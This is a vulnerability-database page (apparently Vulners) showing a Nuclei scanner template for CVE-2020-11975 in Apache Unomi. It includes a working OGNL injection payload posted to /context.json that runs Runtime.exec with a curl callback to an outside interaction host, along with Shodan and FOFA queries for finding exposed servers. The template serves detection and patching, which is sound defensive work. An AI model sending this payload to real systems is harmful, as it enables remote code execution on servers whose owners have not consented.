Lucene search
K

Apache Unomi - Remote Code Execution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Apache Unomi OGNL scripting may call static Java classes to execute arbitrary code.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Input Validation in Apache Unomi
11 Jan 202115:50
githubexploit
GithubExploit
Exploit for CVE-2020-11975
24 Nov 202005:23
githubexploit
GithubExploit
Exploit for Improper Input Validation in Apache Unomi
19 Nov 202008:22
githubexploit
Circl
CVE-2020-11975
22 Jul 202503:54
circl
CNVD
Apache Unomi Input Validation Error Vulnerability
8 Jun 202000:00
cnvd
CVE
CVE-2020-11975
5 Jun 202014:10
cve
Cvelist
CVE-2020-11975
5 Jun 202014:10
cvelist
Github Security Blog
Improper Input Validation in Apache Unomi
9 Feb 202223:20
github
NVD
CVE-2020-11975
5 Jun 202015:15
nvd
OSV
CVE-2020-11975
5 Jun 202015:15
osv
Rows per page
id: CVE-2020-11975

info:
  name: Apache Unomi - Remote Code Execution
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
  impact: |
    Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
  remediation: |
    Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
  reference:
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
    - https://unomi.apache.org/security/cve-2020-11975.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
    epss-score: 0.29885
    epss-percentile: 0.97977
    cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: unomi
    shodan-query: http.title:"Apache Unomi"
    fofa-query: title="Apache Unomi"
  tags: cve,cve2020,apache,unomi,rce,ognl,oast,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"
    headers:
      Content-Type: application/json
    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#[email protected]@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: dsl
        dsl:
          - 'contains_all(body, "profileId\":", "sessionId\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4a0a004730450220353c966bd5bcb91a78b7d8039446d617f91c97b0d265e1fea098addc6f96480802210097a5fee4a6247ab247a2cff33a058c98f89ace0b9f127caf5209ce2b302b55ce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
CVSS 210
EPSS0.29885
10